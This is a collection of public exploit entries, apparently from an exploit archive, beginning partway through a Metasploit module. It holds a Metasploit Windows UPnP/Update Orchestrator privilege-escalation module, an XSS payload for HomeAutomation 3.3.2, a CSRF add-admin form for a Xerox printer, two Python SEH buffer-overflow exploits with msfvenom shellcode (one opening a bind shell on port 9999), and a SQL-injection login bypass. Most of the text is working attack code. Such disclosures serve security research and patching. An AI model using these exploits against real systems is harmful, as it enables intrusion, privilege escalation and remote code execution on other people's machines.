        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    payload_name = ".#{rand_text_alphanumeric 8..12}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Executing payload...'
    res = cmd_exec "echo '#{payload_path}&' | #{reptile_cmd_path} root & echo "
    vprint_line res
  end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'
require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft UPnP Local Privilege Elevation Vulnerability',
      'Description'    => %q(
        This exploit uses two vulnerabilities to execute a command as an elevated user.
        The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to
        NT AUTHORITY\LOCAL SERVICE

        The second (CVE-2019-1322) leverages the Update Orchestrator Service to
        elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'NCC Group',   # Original discovery (https://www.nccgroup.trust/uk/)
          'hoangprod',   # PoC
          'bwatters-r7'  # msf module
        ],
      'Platform'       => ['win'],
      'SessionTypes'   => ['meterpreter'],
      'Targets'        =>
        [
          ['Windows x64', { 'Arch' => ARCH_X64 }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 12 2019',
      'References'     =>
        [
          ['CVE', '2019-1322'],
          ['CVE', '2019-1405'],
          ['EDB', '47684'],
          ['URL', 'https://github.com/apt69/COMahawk'],
          ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],
          ['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => false
        }
    ))
    register_options([
      OptString.new('EXPLOIT_NAME',
                    [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
      OptString.new('PAYLOAD_NAME',
                    [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
      OptString.new('WRITABLE_DIR',
                    [false, 'Path to write binaries (%TEMP% by default).', nil]),
      OptInt.new('EXPLOIT_TIMEOUT',
                 [true, 'The number of seconds to wait for exploit to finish running', 60]),
      OptInt.new('EXECUTE_DELAY',
                 [true, 'The number of seconds to delay between file upload and exploit launch', 3])
    ])
  end

  def exploit
    exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14)
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14)
    exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe')
    payload_name = "#{payload_name}.exe" unless payload_name.end_with?('.exe')
    temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')
    payload_path = "#{temp_path}\\#{payload_name}"
    exploit_path = "#{temp_path}\\#{exploit_name}"
    payload_exe = generate_payload_exe

    # Check target
    vprint_status("Checking Target")
    validate_active_host
    validate_target
    fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path)

    # Upload Exploit
    vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}")
    ensure_clean_destination(exploit_path)
    exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe')
    write_file(exploit_path, exploit_bin)
    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")

    # Upload Payload
    vprint_status("Uploading Payload")
    ensure_clean_destination(payload_path)
    write_file(payload_path, payload_exe)
    print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
    print_warning("This exploit requires manual cleanup of the payload #{payload_path}")

    # Run Exploit
    vprint_status("Running Exploit")
    print_status("It may take a moment after the session is established for the exploit to exit safely.")
    begin
      cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}", 60)
    rescue Rex::TimeoutError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
      print_error("Caught timeout. Exploit may be taking longer or it may have failed.")
    end
    vprint_status("Cleaning up #{exploit_path}")
    ensure_clean_destination(exploit_path)
  end

  def validate_active_host
    begin
      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
    rescue Rex::Post::Meterpreter::RequestError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
      raise Msf::Exploit::Failed, 'Could not connect to session'
    end
  end

  def validate_target
    if sysinfo['Architecture'] == ARCH_X86
      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
    end
    sysinfo_value = sysinfo['OS']
    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
    vprint_status("Build Number = #{build_num}")
    unless sysinfo_value =~ /10/ && (build_num > 17133 && build_num < 18362)
      fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362')
    end
  end

  def ensure_clean_destination(path)
    return unless file?(path)

    print_status("#{path} already exists on the target. Deleting...")
    begin
      file_rm(path)
      print_status("Deleted #{path}")
    rescue Rex::Post::Meterpreter::RequestError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
      print_error("Unable to delete #{path}")
    end
  end
end
# Exploit: HomeAutomation 3.3.2 - Persistent Cross-Site Scripting
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5556
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php
HomeAutomation v3.3.2 Stored and Reflected XSS
Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2
Summary: HomeAutomation is an open-source web interface and scheduling solution.
It was initially made for use with the Telldus TellStick, but is now based on a
plugin system and, besides the TellStick, also supports Crestron,
OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
etc.) based on an advanced scheduling system, taking into account things like
measurements from various sensors. With the houseplan view you can get a simple
overview of the status of your devices at their location in your house.
Desc: HomeAutomation suffers from multiple stored and reflected XSS vulnerabilities
when input passed via several parameters to several scripts is not properly sanitized
before being returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of an affected site.
Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
Apache/2.4.29 (Ubuntu)
PHP/7.4.0RC4
PHP/7.3.11
PHP 7.2.24-0ubuntu0.18.04.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5556
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php
06.11.2019
--
Reflected XSS:
--------------
https://192.168.2.113/?page=houseplan&autologin=1&msg=eyJpZCI6IiIsInRleHQiOiI8bWFycXVlZT50ZXN0PC9tYXJxdWVlPlVzZXJuYW1lIG9yIHBhc3N3b3JkIHdyb25nIiwiYWRkaXRpb25hbFRleHQiOiIiLCJ0eXBlIjoiZXJyb3IiLCJhdXRvQ2xvc2UiOmZhbHNlLCJzaG93T25seUluRGVidWciOmZhbHNlfQ==
Stored XSS:
-----------
POST /homeautomation_v3_3_2/?page=conf-macros HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 998
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryq4LcgA7mbqElCW4q
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: http://localhost/homeautomation_v3_3_2/?page=conf-macros&action=edit&id=-1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: HomeAutomation_user=admin; HomeAutomation_hash=842427e5fc831255d7aa811b70e64957; PHPSESSID=ldcipit064rfp5l8rtcah091og
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="id"
-1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="action"
save
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="name"
XSS
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="comment"
"><script>confirm(document.cookie)</script>
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="icon_on"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="scenario"
1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="devices[0]"
1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="statuses[0]"
1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="save"
Save
------WebKitFormBoundaryq4LcgA7mbqElCW4q--
# Exploit Title: XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-19
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-6655
# Software : Xerox Printer
# Product Version: WorkCentre® 6655
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A
# Description :
# The CSRF vulnerability was discovered in the WorkCentre® 6655 printer model of Xerox printer hardware.
# A request to add a user is made from the Device User Database form, captured with a proxy, and turned
# into a CSRF PoC HTML file. Xerox WorkCentre® 6655 printers accept that replayed request to the xerox.set
# URI, so a forged form submitted from a victim's browser adds the user.
# (The frmUserName value must be unique.)
HTTP POST Request :
POST /dummypost/xerox.set HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Origin: https://server
Connection: close
Referer: https://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
Cookie: PHPSESSID=d7c4d8f8efe7dd919e6d0f5c93ec16cd; PageToShow=; statusSelected=n1; statusNumNodes=9; frmFirstName=%22%3E%3Ch1%3Ea; frmLastName=%22%3E%3Ch1%3Ea; frmCompany=%22%3E%3Ch1%3Ea; frmDisplayName=%22%3E%3Ch1%3Ea%2C%20%22%3E%3Ch1%3Ea; frmEmail=test@test.com; frmIFax=324324324324; frmFaxNumber=324324324324; frmFriendlyName=; frmProtocol=SMB; frmXrxAdd_1=Ipv4; frmDocumentPath=; frmLoginName=; frmServerName=; frmServerVolume=; frmNdsTree=; frmNdsContext=; frmSmbShare=; frmHnAdd_1=; frmIpv4_1_1=0; frmIpv4_1_2=0; frmIpv4_1_3=0; frmIpv4_1_4=0; frmIpv6_Host_1=%3A%3A; WebTimerPopupID=4; propSelected=n28; propNumNodes=117; propHierarchy=000100000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
Upgrade-Insecure-Requests: 1
CSRFToken=72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1
HTTP Response :
HTTP/1.1 200 OK
Date: Wed, 18 Dec 2019 22:09:40 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 13518
CSRF HTML PoC :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://server/dummypost/xerox.set" method="POST">
<input type="hidden" name="CSRFToken" value="72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776" />
<input type="hidden" name="_fun_function" value="HTTP_Set_ccgen_fac_dispatch_fn" />
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?x=&sort=Fname&order=Up" />
<input type="hidden" name="CcgenModule" value="UserEdit" />
<input type="hidden" name="isRoles" value="True" />
<input type="hidden" name="isPassword" value="True" />
<input type="hidden" name="isCreate" value="True" />
<input type="hidden" name="rolesStr" value="2,5,1," />
<input type="hidden" name="limited" value="False" />
<input type="hidden" name="oid" value="0" />
<input type="hidden" name="userName" value="ismailtasdelen" />
<input type="hidden" name="friendlyName" value="Ismail Tasdelen" />
<input type="hidden" name="newPassword" value="Test1234" />
<input type="hidden" name="retypePassword" value="Test1234" />
<input type="hidden" name="role" value="2" />
<input type="hidden" name="role" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: FTP Navigator 8.03 - Stack Overflow (SEH)
# Date: December 28th, 2019
# Exploit Author: boku
# Discovered by: Chris Inzinga
# Original DoS: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)
# Original DoS Link: https://www.exploit-db.com/exploits/47794
# Software Vendor: http://www.internet-soft.com/
# Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1
# Version: Version 8.03
# Tested on: Microsoft Windows 7 Enterprise - 6.1.7601 Service Pack 1 Build 7601 (x86-64)
# Recreate:
#!/usr/bin/python
# 1) Generate 'poc.txt' payload using python 2.7.x
# 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy
# 3) Install & Open FTP Navigator v8.03
# 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command
# - A textbox will appear on the bottom of the right window
# 5) Paste payload from generated txt file into textbox
# 6) Click "Do it"
# - The program will crash & calculator will open
blt = '\033[92m[\033[0m+\033[92m]\033[0m '  # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m '  # bash red error bullet
File = 'poc.txt'
try:
    nops = '\x90'*400
    # msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper
    # x86/alpha_upper succeeded with size 447 (iteration=0)
    shellcode = b""
    shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49"
    shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
    shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
    shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
    shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
    shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
    shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50"
    shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39"
    shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b"
    shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c"
    shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a"
    shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33"
    shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31"
    shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b"
    shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50"
    shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32"
    shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31"
    shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48"
    shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a"
    shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e"
    shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
    shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43"
    shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b"
    shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c"
    shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36"
    shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35"
    shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b"
    shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56"
    shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a"
    shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50"
    shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d"
    shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33"
    shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31"
    shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f"
    shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38"
    shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59"
    shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50"
    shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51"
    shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50"
    shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42"
    shellcode += b"\x4c\x32\x43\x53\x30\x41\x41"
    jmp2nops = '\xe8\xff\xff\xff\xff'      # call +4          // This call lands on the last \xff of the call instruction itself
    jmp2nops += '\xc3'                     # ret/inc ebx      // EIP now points at that \xff, so the bytes execute as \xff\xc3 = inc ebx (harmless, nop-like)
    jmp2nops += '\x59'                     # pop ecx          // Pop the return address that the call pushed onto the stack into ECX
    jmp2nops += '\x31\xd2'                 # xor edx, edx     // Clear EDX; we are going to jump back to the beginning of our buffer
    jmp2nops += '\x66\x81\xca\xfc\x0f'     # or dx, 4092      // EDX is now equal to 0x00000ffc
    jmp2nops += '\x66\x29\xd1'             # sub cx, dx       // Subtract 4092 bytes from the address held in ECX
    jmp2nops += '\xff\xe1'                 # jmp ecx          // Jump back to the beginning of our buffer, into the NOP sled
    offset = '\x41' * (4112-len(nops+shellcode+jmp2nops))
    nSEH = '\xeb\xeb\x90\x90'  # jmp short -22 (to jmp2nops)
    # 0x00457576 [ftpnavi.exe] : pop edx # pop ebx # ret
    # | Rebase: False | ASLR: False | SafeSEH: False
    # | (c:\FTP Navigator\ftpnavi.exe) | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ}
    SEH = '\x76\x75\x45'  # SEH 3 byte overwrite
    payload = nops+shellcode+offset+jmp2nops+nSEH+SEH
    f = open(File, 'w')  # open file for write
    f.write(payload)
    f.close()  # close the file
    print blt + File + " created successfully "
except:
    print err + File + ' failed to create'
# Exploit Title: AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)
# Date: 2019-12-28
# Exploit Author: boku
# Original DoS: https://www.exploit-db.com/exploits/47788
# Original DoS Author: ZwX
# Software Vendor: http://www.avs4you.com/
# Software Link: http://www.avs4you.com/avs-audio-converter.aspx
# Version: 9.1.2.600
# Tested on: Microsoft Windows 10 Home 1909(x86-64) - 10.0.18363 N/A Build 18363
# Microsoft Windows 7 Enterprise(x86-64) - 6.1.7601 Service Pack 1 Build 7601
#!/usr/bin/python
# Recreate:
# 1) Generate the 'bind9999.txt' payload using python 2.7.x on Kali Linux.
# 2) On the victim Windows machine, open the file 'bind9999.txt' with notepad, then Select-All > Copy.
# 3) Install & Open AVS Audio Converter 9.1.2.600.
# 4) Locate the textbox to the right of 'Output Folder:'; at the bottom of the main window.
# 5) Paste the copied payload from the 'bind9999.txt' file into the textbox.
# 6) Click the 'Browse...' button; to the right of the textbox.
# - The program will freeze & a bind shell will be listening on tcp port 9999; on all interfaces.
# Special thanks to: The Offsec Team, Corelan Team, Vivek/Pentester Academy Team, Skape
blt = '\033[92m[\033[0m+\033[92m]\033[0m '  # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m '  # bash red error bullet
File = 'bind9999.txt'
try:
    # 0x00400000 [AVSAudioConverter.exe]
    # 9.1.2.600 (C:\Program Files (x86)\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)
    # - The only module that has SafeSEH disabled.
    # Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll |
    # 0x00400000 | 0x00f33000 | False  | False   | False | False    | False  |
    # - Attempting a 3-byte SEH-handler overwrite will fail due to no exception being thrown.
    offEdx = '\x41'*260
    edx = '\x42\x42\x42\x42'  # EDX overwrite at 260 bytes. EDX=0x42424242
    # SEH-Record overwrite at offset 264; the goal from here is to not throw an exception or we're screwed.
    nSEH = '\x42'*4
    SEH = '\x43'*4
    # - If address at offset 308 is not readable, then the program will throw an exception at:
    #   75F9ECE7  3806  cmp byte ptr ds:[esi], al
    #   [!] Access violation when reading [esi]
    # - If we can get past this exception, we can overwrite EIP at offset 304.
    # - [esi] must be successfully overwritten so we can put our payload after it.
    offEip = '\x45'*32
    # - AVSAudioEditor5.dll is the only other module with both ASLR & Rebase disabled.
    # - The enabled SafeSEH blocks us from using it for a SEH overwrite, but we can still jump
    #   to it with a vanilla EIP overwrite; due to overwriting a return address on the stack.
    # - After bypassing the ESI read exception, our stack will look like this after the EIP overwrite:
    #   ECX=0018FA60 ESP=0018FA60 (Stack locations will vary)
    #    0018FA54  45454545  EEEE  // [296]
    #    0018FA58  45454545  EEEE  // [300]
    #    0018FA5C  1006563E  V...  // [304] eip var      # Pointer to 'pop+ret'
    #   *0018FA60  00000000  ....  // [308] esi var      # our esi address gets replaced by 4 nulls
    #    0018FA64  1006A438  8...  // [312] jmpEsp var   # Pointer to 'jmp esp'
    #    0018FA68  E510EC10  ....  // [316] fixStack var # ASM to fix the Stack so shellcode will work
    # [AVSAudioEditor5.dll] (C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSAudioEditor5.dll)
    # Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll |
    # 0x10000000 | 0x100a1000 | False  | True    | False | False    | False  |
    # 0x1006563e : pop esi # ret | ascii {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
    eip = '\x3e\x56\x06\x10'  # pop+ret
    # - After pop+ret, ESP=0018FA68
    esi = '\x10\x10\x08\x10'  # [AVSAudioEditor5.dll] | .data | RW
    # 0x1006a438 : jmp esp | {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
    # - the esi var address is just a random, readable memory location that will not move; to bypass the exception.
    jmpEsp = '\x38\xa4\x06\x10'  # jmp esp pointer
    # EBP is 45454545 at this point. Needs to be fixed for most shellcode payloads to work properly.
    fixStack = '\x83\xEC\x10'   # sub esp, 0x10
    fixStack += '\x89\xE5'      # mov ebp, esp
    fixStack += '\x83\xEC\x60'  # sub esp, 0x60
    # msfvenom -p windows/shell_bind_tcp LPORT=9999 -v shellcode -a x86 --platform windows -b '\x00' --format python
    # x86/shikata_ga_nai succeeded with size 355 (iteration=0)
    shellcode = b""
    shellcode += b"\xbe\xd8\x49\x8d\x72\xd9\xe5\xd9\x74\x24\xf4"
    shellcode += b"\x5a\x31\xc9\xb1\x53\x31\x72\x12\x83\xea\xfc"
    shellcode += b"\x03\xaa\x47\x6f\x87\xb6\xb0\xed\x68\x46\x41"
    shellcode += b"\x92\xe1\xa3\x70\x92\x96\xa0\x23\x22\xdc\xe4"
    shellcode += b"\xcf\xc9\xb0\x1c\x5b\xbf\x1c\x13\xec\x0a\x7b"
    shellcode += b"\x1a\xed\x27\xbf\x3d\x6d\x3a\xec\x9d\x4c\xf5"
    shellcode += b"\xe1\xdc\x89\xe8\x08\x8c\x42\x66\xbe\x20\xe6"
    shellcode += b"\x32\x03\xcb\xb4\xd3\x03\x28\x0c\xd5\x22\xff"
    shellcode += b"\x06\x8c\xe4\xfe\xcb\xa4\xac\x18\x0f\x80\x67"
    shellcode += b"\x93\xfb\x7e\x76\x75\x32\x7e\xd5\xb8\xfa\x8d"
    shellcode += b"\x27\xfd\x3d\x6e\x52\xf7\x3d\x13\x65\xcc\x3c"
    shellcode += b"\xcf\xe0\xd6\xe7\x84\x53\x32\x19\x48\x05\xb1"
    shellcode += b"\x15\x25\x41\x9d\x39\xb8\x86\x96\x46\x31\x29"
    shellcode += b"\x78\xcf\x01\x0e\x5c\x8b\xd2\x2f\xc5\x71\xb4"
    shellcode += b"\x50\x15\xda\x69\xf5\x5e\xf7\x7e\x84\x3d\x90"
    shellcode += b"\xb3\xa5\xbd\x60\xdc\xbe\xce\x52\x43\x15\x58"
    shellcode += b"\xdf\x0c\xb3\x9f\x20\x27\x03\x0f\xdf\xc8\x74"
    shellcode += b"\x06\x24\x9c\x24\x30\x8d\x9d\xae\xc0\x32\x48"
    shellcode += b"\x5a\xc8\x95\x23\x79\x35\x65\x94\x3d\x95\x0e"
    shellcode += b"\xfe\xb1\xca\x2f\x01\x18\x63\xc7\xfc\xa3\xac"
    shellcode += b"\x17\x88\x42\xd8\x37\xdc\xdd\x74\xfa\x3b\xd6"
    shellcode += b"\xe3\x05\x6e\x4e\x83\x4e\x78\x49\xac\x4e\xae"
    shellcode += b"\xfd\x3a\xc5\xbd\x39\x5b\xda\xeb\x69\x0c\x4d"
    shellcode += b"\x61\xf8\x7f\xef\x76\xd1\x17\x8c\xe5\xbe\xe7"
    shellcode += b"\xdb\x15\x69\xb0\x8c\xe8\x60\x54\x21\x52\xdb"
    shellcode += b"\x4a\xb8\x02\x24\xce\x67\xf7\xab\xcf\xea\x43"
    shellcode += b"\x88\xdf\x32\x4b\x94\x8b\xea\x1a\x42\x65\x4d"
    shellcode += b"\xf5\x24\xdf\x07\xaa\xee\xb7\xde\x80\x30\xc1"
    shellcode += b"\xde\xcc\xc6\x2d\x6e\xb9\x9e\x52\x5f\x2d\x17"
    shellcode += b"\x2b\xbd\xcd\xd8\xe6\x05\xfd\x92\xaa\x2c\x96"
    shellcode += b"\x7a\x3f\x6d\xfb\x7c\xea\xb2\x02\xff\x1e\x4b"
    shellcode += b"\xf1\x1f\x6b\x4e\xbd\xa7\x80\x22\xae\x4d\xa6"
    shellcode += b"\x91\xcf\x47"
    payload = offEdx+edx+nSEH+SEH+offEip+eip+esi+jmpEsp+fixStack+shellcode
    # offsets:  0    260  264  268  272    304 308 312    316      324
    f = open(File, 'w')  # open file for write
    f.write(payload)
    f.close()  # close the file
    print blt + File + " created successfully "
    # root@kali# nc <Victim IP> 9999
    # Microsoft Windows [Version 6.1.7601]
    # C:\Program Files (x86)\AVS4YOU\AVSAudioConverter>
except:
    print err + File + ' failed to create'
# Exploit Title: elearning-script 1.0 - Authentication Bypass
# Author: riamloo
# Date: 2019-12-29
# Vendor Homepage: https://github.com/amitkolloldey/elearning-script
# Software Link: https://github.com/amitkolloldey/elearning-script/archive/master.zip
# Version: 1
# CVE: N/A
# Tested on: Win 10
# Description:
# E Learning Blog Developed In Raw PHP
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : /login.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/elearning-script-master/login.php
POST /elearning-script-master/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
Content-Length: 445
Referer: http://localhost/elearning-script-master/login.php
Cookie: PHPSESSID=a81sp8jg62nzxs8icvbf44ep3iu
Connection: close
Upgrade-Insecure-Requests: 1
'=''or'
